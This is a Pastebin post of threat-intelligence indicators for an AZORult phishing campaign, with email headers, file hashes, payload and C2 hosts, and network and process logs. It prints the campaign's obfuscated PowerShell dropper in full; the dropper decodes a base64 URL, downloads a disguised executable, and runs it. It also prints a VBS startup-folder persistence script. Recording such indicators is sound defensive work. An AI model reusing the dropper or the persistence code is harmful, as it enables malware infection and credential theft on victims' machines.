Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #AZORult #LNK #MSHTA #PowerShell
- https://pastebin.com/0bX17LaY
- previous_contact:
- --------------
- 17/09/18 https://pastebin.com/MwwZ7DyY
- FAQ:
- https://www.bleepingcomputer.com/news/security/azorult-trojan-steals-passwords-while-hiding-as-google-update/
- attack_vector
- --------------
- email attach .ZIP > .LNK > GET .HTA > PowerShell > GET .GIF(EXE) > %Public%\???.exe > %AppData%\0mbii\gsir.exe
- email_headers
- --------------
- Received: from jyotiimpex.co.in ([157.230.191.189])
- by srv8.victim0.com for <user00@org88.victim0.com>; (envelope-from admin@jyotiimpex.co.in)
- Reply-To: yakupabaci@ulasvana.com
- From: Biju Kurian <admin@jyotiimpex.co.in>
- To: user00@org88.victim0.com
- Subject: Attached proposal #506697
- Date: 08 Apr 2019 10:45:51 -0700
- files
- --------------
- SHA-256 71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455
- File name 506697.gif.zip [Zip archive data, at least v2.0 to extract]
- File size 624 B (624 bytes)
- SHA-256 67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80
- File name 506697.gif.lnk [MS Windows shortcut, window=hidenormalshowminimized]
- File size 1.65 KB (1686 bytes)
- SHA-256 f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1
- File name out-761452637.hta [HTML document, ASCII text, with very long lines]
- File size 4.28 KB (4387 bytes)
- SHA-256 3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b
- File name 506697.gif [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 674 KB (690176 bytes)
- activity
- **************
- PL_SRC:
- gingerandcoblog{.} com/test/wp/out-761452637.hta [1st, initiate]
- gingerandcoblog{.} com/test/wp/506697.gif [2nd, main file]
- C2:
- cubaworts{.} gq//700/index.php
- Powershell
- "
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null;$bnFZCsAPHdW = Get-Random -Min 3 -Max 4;$AwQvehGyXOx = ([char[]]([char]97..[char]122));$uMoLAqAH = -join ($AwQvehGyXOx | Get-Random -Count $bnFZCsAPHdW | % {[Char]$_});$QBkXeDKCYCLy = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$fhMedM = $uMoLAqAH + $QBkXeDKCYCLy;$dlOPRLx=[char]0x53+[char]0x61+[char]0x4c;$XcjKCQxFekfTxHL=[char]0x49+[char]0x45+[char]0x58;$ZMIxPpGnUUPPRWE=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL jigvt $dlOPRLx;$VBStX=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;jigvt xambduhok $XcjKCQxFekfTxHL;$ITLGukyfdgq=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|xambduhok;jigvt igrvdkq $ZMIxPpGnUUPPRWE;$hJoIuIdIUjzbq = $ITLGukyfdgq + [char]0x5c + $fhMedM;;;;$chNKlgFcqw = 'aHR0cDovL2dpbmdlcmFuZGNvYmxvZy5jb20vdGVzdC93cC81MDY2OTcuZ2lm';$chNKlgFcqw=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($chNKlgFcqw));$QWTFrOflwfozpH = New-Object $VBStX;$JteOSk = $QWTFrOflwfozpH.DownloadData($chNKlgFcqw);[IO.File]::WriteAllBytes($hJoIuIdIUjzbq, $JteOSk);igrvdkq $hJoIuIdIUjzbq;;$NtkaFAJOmWuKn = @($wuHDKfhU, $sjRJmloYxc, $cfkBskr, $FugqnvRQKP);foreach($lvAJQrBp in $NtkaFAJOmWuKn){$null = $_}""
- "
- netwrk
- --------------
- 67.225.197.20 gingerandcoblog{.} com GET /test/wp/out-761452637.hta HTTP/1.1 Mozilla/4.0
- 67.225.197.20 gingerandcoblog{.} com GET /test/wp/506697.gif HTTP/1.1 No User Agent [!..This program must be run under Win32]
- 51.89.0.140 cubaworts{.} gq POST /700/index.php HTTP/1.1 Mozilla/4.0
- comp
- --------------
- mshta.exe 3428 TCP localhost 50097 67.225.197.20 80 SYN_SENT
- mshta.exe 3428 TCP localhost 50098 67.225.197.20 80 ESTABLISHED
- powershell.exe 3244 TCP localhost 50099 67.225.197.20 80 ESTABLISHED
- [System] 0 TCP localhost 50100 51.89.0.140 80 TIME_WAIT
- proc
- --------------
- "C:\Windows\system32\mshta.exe" h11p:\ gingerandcoblog{.} com/test/wp/out-761452637.hta
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -Window 1 [void] $null ...
- C:\Users\Public\qkn.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe
- "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "gsir.exe"
- C:\Windows\system32\timeout.exe 3
- persist
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 29.03.2019 11:03
- 0mbii.vbs
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\0mbii.vbs 29.03.2019 11:03
- 0mbii.vbs
- - - - - -
- "
- SEt wdd = CreateObjEcT("wScRipt.shelL")
- WdD.Run """C:\Users\operator\AppData\Roaming\0mbii\gsir.exe"""
- "
- drop
- --------------
- C:\Users\Public\qkn.exe
- C:\Users\operator\AppData\Roaming\0mbii\gsir.exe [removed]
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0mbii.vbs
- # # #
- https://www.virustotal.com/gui/file/71c5bd4bc1d84bfff6f83f87576bc7b6861b227ee85ed419a8b35a23c1f64455/details
- https://www.virustotal.com/gui/file/67ad9399978fbf5f8efcb2c3e55d06d3bc26f9892ef18462137125455ad4fb80/details
- https://www.virustotal.com/gui/file/f2bb4f19e758074b31ab6e00d6e1810af709d8ea8f6f9f1152d3954c67a339f1/details
- https://www.virustotal.com/gui/file/3e3f7950441682275131bba6d26ac89941685652ec602011480302a616d2f53b/details
- https://analyze.intezer.com/#/analyses/67953fad-ecb2-46b4-90d0-251e72079f8d
- VR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement